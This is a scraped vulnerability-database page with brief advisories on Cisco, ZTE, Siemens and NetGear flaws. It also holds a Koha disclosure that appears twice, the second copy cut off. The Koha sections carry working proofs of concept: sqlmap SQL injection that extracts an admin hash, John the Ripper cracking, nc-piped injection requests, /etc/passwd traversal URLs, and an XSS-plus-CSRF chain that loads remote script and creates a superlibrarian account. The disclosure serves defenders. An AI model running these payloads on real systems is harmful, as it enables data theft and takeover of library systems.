VARIoT IoT vulnerabilities database

The packet-storing feature on Cisco 9900 phones with firmware 9.3(2) does not properly support the RTP protocol, which allows remote attackers to cause a denial of service (device hang) by sending malformed RTP packets after a call is answered, aka Bug ID CSCur39976. Vendors have confirmed this vulnerability Bug ID CSCur39976 It is released as.Malformed after a third party answers the call RTP Service interruption due to packet transmission ( Device hang ) There is a possibility of being put into a state. The Cisco 9900 Series IP Phones are the 9900 Series IP Telephony products from Cisco. The product provides voice and video capabilities. An attacker can exploit this issue to cause an affected device to become unresponsive, resulting in a denial-of-service condition. This issue is tracked by Cisco Bug ID CSCur39976

Memory leak in Cisco Headend System Release allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors, aka Bug ID CSCus91838. Vendors have confirmed this vulnerability Bug ID CSCus91838 It is released as.Service disruption by a third party ( Memory consumption ) There is a possibility of being put into a state. Cisco Headend System Releases is a digital broadband transmission system. An attacker can exploit this issue to cause a denial-of-service condition. This issue is being tracked by Cisco Bug ID CSCus91838

The web framework in Cisco Unified Communications Domain Manager 8.1(4)ER1 allows remote attackers to obtain sensitive information by visiting a bvsmweb URL, aka Bug ID CSCuq22589. Vendors have confirmed this vulnerability Bug ID CSCuq22589 It is released as.By a third party bvsmweb URL By accessing, important information may be obtained. Successfully exploiting this issue may allow an attacker to obtain sensitive information that may aid in further attacks. This issue is tracked by Cisco Bug ID CSCuq22589. This component features scalable, distributed, and highly available enterprise Voice over IP call processing

There is an unprotected broadcast receiver in the built-in application cn.nubia.factory of ZTE Nubia Z7 series mobile phone system cn.nubia.factory.service.FactoryResetReciver, a local malicious user does not need any Android permissions to send a malicious broadcast to the broadcast receiver. Without manual intervention, it can cause the Android system to format the external storage SD card. Clear all user data, restore factory settings, and restart the phone.

Cross-site scripting (XSS) vulnerability in the integrated web server on the Siemens Climatix BACnet/IP communication module with firmware before 10.34 allows remote attackers to inject arbitrary web script or HTML via a crafted URL. The Siemens Climatix BACnet/IP communication module is a communication module in the BACnet network of Siemens AG. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks

Cisco Application Policy Infrastructure Controller (APIC) 1.0(1.110a) and 1.0(1e) on Nexus 9000 devices does not properly implement RBAC health scoring, which allows remote authenticated users to obtain sensitive information via unspecified vectors, aka Bug ID CSCuq77485. Vendors have confirmed this vulnerability Bug ID CSCuq77485 It is released as.Remotely authenticated users can obtain important information. All ACI information, optimizing application lifecycles, configuring applications across physical and virtual resources, and more. A security vulnerability exists in Cisco APIC 1.0 (1.110a) and 1.0 (1e) versions on Cisco Nexus 9000 devices due to the failure of the program to properly handle the RBAC protection mechanism of \342\200\230health scores\342\200\231. A remote attacker can exploit this vulnerability to obtain sensitive information. Attackers can exploit this issue to gain unauthorized access to the affected application. This may aid in further attacks. This issue is being tracked by Cisco bug ID CSCuq77485

Multiple NetGear ProSafe routers are prone to multiple security vulnerabilities. Successful exploits could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database and to insert a crafted HTTP header into an HTTP response that could cause a web page redirection to a possible malicious website.

The remote-support feature on Cisco Web Security Virtual Appliance (WSAv), Email Security Virtual Appliance (ESAv), and Security Management Virtual Appliance (SMAv) devices before 2015-06-25 uses the same default SSH root authorized key across different customers' installations, which makes it easier for remote attackers to bypass authentication by leveraging knowledge of a private key from another installation, aka Bug IDs CSCuu95988, CSCuu95994, and CSCuu96630. SSH of root There is a vulnerability that bypasses authentication because it uses the same key that was authenticated with. Vendors have confirmed this vulnerability Bug ID CSCuu95988 , CSCuu95994 ,and CSCuu96630 It is released as.Authentication may be avoided by using a private key information obtained from another customer's installation by a third party. Multiple Cisco products are prone to a privilege-escalation vulnerability. This issue is being tracked by Cisco Bug ID's CSCuu95988, CSCuu95994, and CSCuu96630

The remote-support feature on Cisco Web Security Virtual Appliance (WSAv), Email Security Virtual Appliance (ESAv), and Security Management Virtual Appliance (SMAv) devices before 2015-06-25 uses the same default SSH host keys across different customers' installations, which makes it easier for remote attackers to defeat cryptographic protection mechanisms by leveraging knowledge of a private key from another installation, aka Bug IDs CSCus29681, CSCuu95676, and CSCuu96601. SSH Since the host key is used, there is a vulnerability that can break the cryptographic protection mechanism. Vendors have confirmed this vulnerability Bug ID CSCus29681 , CSCuu95676 ,and CSCuu96601 It is released as.A third party may break the cryptographic protection mechanism by using the private key information obtained from other customer installations. Multiple Cisco products are prone to a security-bypass vulnerability because the application fails to properly validate SSL certificates from the server. An attacker can exploit this issue to bypass security restrictions and perform unauthorized actions. This may aid in further attacks. This issue is being tracked by Cisco Bug ID's CSCus29681, CSCuu95676, and CSCuu96601. The following products are affected: Cisco WSAv, ESAv, SMAv

Cisco Wireless LAN Controller (WLC) devices with software 7.0(240.0) allow local users to execute arbitrary OS commands in a privileged context via crafted CLI commands, aka Bug ID CSCuj39474. OS A command execution vulnerability exists. The product provides security policy, intrusion detection and other functions in the wireless LAN. A security vulnerability exists in Cisco WLC devices that use version 7.0 (240.0) software. Successful exploits may compromise the affected device. This issue being tracked by Cisco Bug ID CSCuj39474

Cross-site scripting (XSS) vulnerability in Cisco Unified Presence Server 9.1(1) allows remote attackers to inject arbitrary web script or HTML via an unspecified value, aka Bug ID CSCuq03773. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug ID CSCuq03773. This component is responsible for collecting the user's availability status and communication capability information

Multiple SQL injection vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow (1) remote attackers to execute arbitrary SQL commands via the number parameter to opac-tags_subject.pl in the OPAC interface or (2) remote authenticated users to execute arbitrary SQL commands via the Filter or (3) Criteria parameter to reports/borrowers_out.pl in the Staff interface. Koha In SQL An injection vulnerability exists.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Koha is the first open source library automation system. Koha is prone to the following security vulnerabilities: 1. Multiple SQL-injection vulnerabilities 2. Multiple directory-traversal vulnerabilities 3. Multiple HTML Injection vulnerabilities 4. Multiple cross-site scripting vulnerabilities 5. Multiple cross site request forgery vulnerabilities An attacker may leverage these issues to access or modify data, exploit latent vulnerabilities in the underlying database, read arbitrary files,allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and to perform unauthorized actions in the context of a logged-in user of the affected application.This may aid in further attacks. =============================================================================================== SBA Research Vulnerability Disclosure  =============================================================================================== title: Koha Unauthenticated SQL injection product:         Koha ILS affected version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12 fixed version: 3.20.1, 3.17.8, 3.16.12 CVE numbers: CVE-2015-4633, CVE-2015-4632, CVE-2015-4631 impact: critical website:         http://www.koha-community.org/ found by:         Raschin Tavakoli / SBA Research Combinatorial Security Testing Group contact:         cst@sba-research.org References: http://koha-community.org/security-release-koha-3-20-1/         http://koha-community.org/security-release-koha-3-18-8/         http://koha-community.org/security-release-koha-3-16-12/         http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412         http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408         http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426         http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416         http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418         ​http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423 =============================================================================================== ========================= 1. If the webserver is misconfigured, the file-system may be accessed as well. References: ----------- http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412 # ################################################################################################## # # PoC:     # # ################################################################################################## # 1. Inspect Koha database schema    Have a look at how to query the database for superlibrarian users:    http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians    So basically we we need to execute some SQL statement like this:    sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1; 2. Query the database with sqlmap    So let's fire up sqlmap with the --sql-shell parameter and input the query:    root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4          _     ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150513}    |_ -| . | |     | .'| . |    |___|_  |_|_|_|_|__,|  _|          |_|           |_|   http://sqlmap.org    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program    [*] starting at 09:20:07    [09:20:07] [INFO] testing connection to the target URL    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:    ---    Parameter: number (GET)        Type: AND/OR time-based blind        Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)        Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)    ---    [09:20:09] [INFO] testing MySQL    [09:20:09] [INFO] confirming MySQL    [09:20:09] [INFO] the back-end DBMS is MySQL    web server operating system: Linux Debian    web application technology: Apache 2.4.10    back-end DBMS: MySQL >= 5.0.0    [09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER    sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;    [09:20:25] [INFO] fetching SQL SELECT statement query output: 'select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1'    [09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind    [09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait..............................                                          [09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors     admin    [09:21:46] [INFO] retrieved: $2a$08$taQ    [09:23:33] [ERROR] invalid character detected. retrying..    [09:23:33] [WARNING] increasing time delay to 5 seconds     afOgEEhU    [09:25:10] [ERROR] invalid character detected. retrying..    [09:25:10] [WARNING] increasing time delay to 6 seconds     t/gW    [09:26:13] [ERROR] invalid character detected. retrying..    [09:26:13] [WARNING] increasing time delay to 7 seconds     TOmqnYe1Y6ZNxCENa    [09:29:57] [ERROR] invalid character detected. retrying..    [09:29:57] [WARNING] increasing time delay to 8 seconds     2.ONk2eZhnuEw5z9OjjxS    [09:35:08] [ERROR] invalid character detected. retrying..    [09:35:08] [WARNING] increasing time delay to 9 seconds     select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;:        'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS' 3. Feed john the ripper and be lucky    root@kali:/home/wicked# echo "$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS" > ./admin-pass    root@kali:/home/wicked# john ./admin-pass     Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])    admin            (?)    guesses: 1  time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015)  c/s: 260  trying: Smokey - allstate    Use the "--show" option to display all of the cracked passwords reliably    root@kali:/home/wicked# john ./admin-pass --show    ?:admin    1 password hash cracked, 0 left 4. If the webserver is misconfigured, read & write access to the filesystem may be possible. References: ----------- http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426 # ################################################################################################## # # PoC:     # # ################################################################################################## # ==================================================================== 1. "Criteria" Parameter, Payload: ELT(1=1,'evil') / ELT(1=2,'evil') ==================================================================== echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc testbox 9002 echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')" | nc testbox 9002 ==================================================================== 2. "Filter" Parameter, Payload: P_COM'+AND+'a'='a / P_COM'+AND+'a'='b ==================================================================== echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='a" | nc testbox 9002 echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='b" | nc testbox 9002 ==================================================================== You will notice different output in every second request, demonstrating the evaluation of the payload. # ################################################################################################## # # PoC End     # # ################################################################################################## # ================================= 3. Path Traversal (CVE-2015-4633) ================================= Vulnerability ------------- The "template_path" parmeter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search is vulnerable to Path Traversal. References ---------- http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408 # ################################################################################################## # # PoC:     # # ################################################################################################## # The following input is used to print out /etc/passwd: /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd /cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd # ################################################################################################## # # PoC End     # # ################################################################################################## # ================================= 4. The site also lacks in the implementation of challenge tokens that prevent cross-site  forgery (XSRF) attacks.   The attack can be performed by: - through a compromised user account. User/Password retrieval can happen via brute force, sniffing or through SQLI (CVE-2015-4633) - through a user clicking a malicious link (phishing mail, forum link etc.) The following pages are affected from stored XSS flaws: /cgi-bin/koha/opac-shelves.pl /cgi-bin/koha/virtualshelves/shelves.pl The following pages are affected from relfective XSS flaws: /cgi-bin/koha/opac-shelves.pl (parameters: "direction", "display") /cgi-bin/koha/opac-search.pl (parameters: "tag") /cgi-bin/koha/authorities/authorities-home.pl (parameters: "value")  /cgi-bin/koha/acqui/lateorders.pl (parameters: "delay") /cgi-bin/koha/admin/auth_subfields_structure.pl (parameters: "authtypecode","tagfield") /cgi-bin/koha/admin/marc_subfields_structure.pl (parameters: "tagfield") /cgi-bin/koha/catalogue/search.pl (parameters: "limit") /cgi-bin/koha/serials/serials-search.pl (parameters: "bookseller_filter", "callnumber_filter", "EAN_filter", "ISSN_filter", "publisher_filter", "title_filter")  /cgi-bin/koha/suggestion/suggestion.pl (parameters: "author", "collectiontitle", "copyrightdate", "isbn", "manageddate_from", "manageddate_to", "publishercode", "suggesteddate_from", "suggesteddate_to") Impact ---------- The vulnerabilites allow remote attackers to inject arbitrary web script or HTML in order to: - escalate privileges by targeting staff members with XSRF  - target users via browser exploits - target the webserver by combining with other server-side vulnerabilities.   References ---------------- http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418 # ################################################################################################## # # PoC / Attack Scenario:     # # ################################################################################################## # Alice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link: --> http://<opac-interface>/cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+<script+src='http://cst.sba-research.org/x.js'/>&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0 Bob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens  --> http://<staff-interface>/cgi-bin/koha/virtualshelves/shelves.pl the malcious code get's executed. The code can then perform any unauthorized actions with the pemissions of user bob. For example: Create new user: ----------------------- --> http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowernumber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipcode=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipcode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1=&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontactphone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06%2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode=P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFESSION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1 Give the new user superlibririan permission: ---------------------------------------------------------- --> http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian The attacker can now log as superlibrarian. Side Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link. Alice needs to have access to the OPAC interface and to have permissions to create public lists. # ################################################################################################## # # PoC / Attack Scenario End     # # ################################################################################################## #

Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search. Koha Contains a path traversal vulnerability.Information may be obtained. Koha is the first open source library automation system. Koha has a SQL injection vulnerability that allows an attacker to exploit a vulnerability to access or modify database data. Koha is prone to the following security vulnerabilities: 1. Multiple SQL-injection vulnerabilities 2. Multiple directory-traversal vulnerabilities 3. Multiple HTML Injection vulnerabilities 4. Multiple cross-site scripting vulnerabilities 5. Multiple cross site request forgery vulnerabilities An attacker may leverage these issues to access or modify data, exploit latent vulnerabilities in the underlying database, read arbitrary files,allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and to perform unauthorized actions in the context of a logged-in user of the affected application.This may aid in further attacks. =============================================================================================== SBA Research Vulnerability Disclosure  =============================================================================================== title: Koha Unauthenticated SQL injection product:         Koha ILS affected version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12 fixed version: 3.20.1, 3.17.8, 3.16.12 CVE numbers: CVE-2015-4633, CVE-2015-4632, CVE-2015-4631 impact: critical website:         http://www.koha-community.org/ found by:         Raschin Tavakoli / SBA Research Combinatorial Security Testing Group contact:         cst@sba-research.org References: http://koha-community.org/security-release-koha-3-20-1/         http://koha-community.org/security-release-koha-3-18-8/         http://koha-community.org/security-release-koha-3-16-12/         http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412         http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408         http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426         http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416         http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418         ​http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423 =============================================================================================== ========================= 1. Mutiple SQL Injections ========================= + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + a) Unauthenticated SQL Injection in OPAC interface (CVE-2015-4633)   + + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + Vulnerability: -------------- The url parameter 'number' in /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI. If the webserver is misconfigured, the file-system may be accessed as well. References: ----------- http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412 # ################################################################################################## # # PoC:     # # ################################################################################################## # 1. Inspect Koha database schema    Have a look at how to query the database for superlibrarian users:    http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians    So basically we we need to execute some SQL statement like this:    sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1; 2. Query the database with sqlmap    So let's fire up sqlmap with the --sql-shell parameter and input the query:    root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4          _     ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150513}    |_ -| . | |     | .'| . |    |___|_  |_|_|_|_|__,|  _|          |_|           |_|   http://sqlmap.org    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program    [*] starting at 09:20:07    [09:20:07] [INFO] testing connection to the target URL    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:    ---    Parameter: number (GET)        Type: AND/OR time-based blind        Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)        Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)    ---    [09:20:09] [INFO] testing MySQL    [09:20:09] [INFO] confirming MySQL    [09:20:09] [INFO] the back-end DBMS is MySQL    web server operating system: Linux Debian    web application technology: Apache 2.4.10    back-end DBMS: MySQL >= 5.0.0    [09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER    sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;    [09:20:25] [INFO] fetching SQL SELECT statement query output: 'select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1'    [09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind    [09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait..............................                                          [09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors     admin    [09:21:46] [INFO] retrieved: $2a$08$taQ    [09:23:33] [ERROR] invalid character detected. retrying..    [09:23:33] [WARNING] increasing time delay to 5 seconds     afOgEEhU    [09:25:10] [ERROR] invalid character detected. retrying..    [09:25:10] [WARNING] increasing time delay to 6 seconds     t/gW    [09:26:13] [ERROR] invalid character detected. retrying..    [09:26:13] [WARNING] increasing time delay to 7 seconds     TOmqnYe1Y6ZNxCENa    [09:29:57] [ERROR] invalid character detected. retrying..    [09:29:57] [WARNING] increasing time delay to 8 seconds     2.ONk2eZhnuEw5z9OjjxS    [09:35:08] [ERROR] invalid character detected. retrying..    [09:35:08] [WARNING] increasing time delay to 9 seconds     select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;:        'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS' 3. Feed john the ripper and be lucky    root@kali:/home/wicked# echo "$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS" > ./admin-pass    root@kali:/home/wicked# john ./admin-pass     Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])    admin            (?)    guesses: 1  time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015)  c/s: 260  trying: Smokey - allstate    Use the "--show" option to display all of the cracked passwords reliably    root@kali:/home/wicked# john ./admin-pass --show    ?:admin    1 password hash cracked, 0 left 4. If the webserver is misconfigured, read & write access to the filesystem may be possible. References: ----------- http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426 # ################################################################################################## # # PoC:     # # ################################################################################################## # ==================================================================== 1. "Criteria" Parameter, Payload: ELT(1=1,'evil') / ELT(1=2,'evil') ==================================================================== echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc testbox 9002 echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')" | nc testbox 9002 ==================================================================== 2. "Filter" Parameter, Payload: P_COM'+AND+'a'='a / P_COM'+AND+'a'='b ==================================================================== echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='a" | nc testbox 9002 echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='b" | nc testbox 9002 ==================================================================== You will notice different output in every second request, demonstrating the evaluation of the payload. # ################################################################################################## # # PoC End     # # ################################################################################################## # ================================= 3. References ---------- http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408 # ################################################################################################## # # PoC:     # # ################################################################################################## # The following input is used to print out /etc/passwd: /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd /cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd # ################################################################################################## # # PoC End     # # ################################################################################################## # ================================= 4. The site also lacks in the implementation of challenge tokens that prevent cross-site  forgery (XSRF) attacks.   The attack can be performed by: - through a compromised user account. User/Password retrieval can happen via brute force, sniffing or through SQLI (CVE-2015-4633) - through a user clicking a malicious link (phishing mail, forum link etc.) The following pages are affected from stored XSS flaws: /cgi-bin/koha/opac-shelves.pl /cgi-bin/koha/virtualshelves/shelves.pl The following pages are affected from relfective XSS flaws: /cgi-bin/koha/opac-shelves.pl (parameters: "direction", "display") /cgi-bin/koha/opac-search.pl (parameters: "tag") /cgi-bin/koha/authorities/authorities-home.pl (parameters: "value")  /cgi-bin/koha/acqui/lateorders.pl (parameters: "delay") /cgi-bin/koha/admin/auth_subfields_structure.pl (parameters: "authtypecode","tagfield") /cgi-bin/koha/admin/marc_subfields_structure.pl (parameters: "tagfield") /cgi-bin/koha/catalogue/search.pl (parameters: "limit") /cgi-bin/koha/serials/serials-search.pl (parameters: "bookseller_filter", "callnumber_filter", "EAN_filter", "ISSN_filter", "publisher_filter", "title_filter")  /cgi-bin/koha/suggestion/suggestion.pl (parameters: "author", "collectiontitle", "copyrightdate", "isbn", "manageddate_from", "manageddate_to", "publishercode", "suggesteddate_from", "suggesteddate_to") Impact ---------- The vulnerabilites allow remote attackers to inject arbitrary web script or HTML in order to: - escalate privileges by targeting staff members with XSRF  - target users via browser exploits - target the webserver by combining with other server-side vulnerabilities.   References ---------------- http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418 # ################################################################################################## # # PoC / Attack Scenario:     # # ################################################################################################## # Alice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link: --> http://<opac-interface>/cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+<script+src='http://cst.sba-research.org/x.js'/>&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0 Bob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens  --> http://<staff-interface>/cgi-bin/koha/virtualshelves/shelves.pl the malcious code get's executed. The code can then perform any unauthorized actions with the pemissions of user bob. For example: Create new user: ----------------------- --> 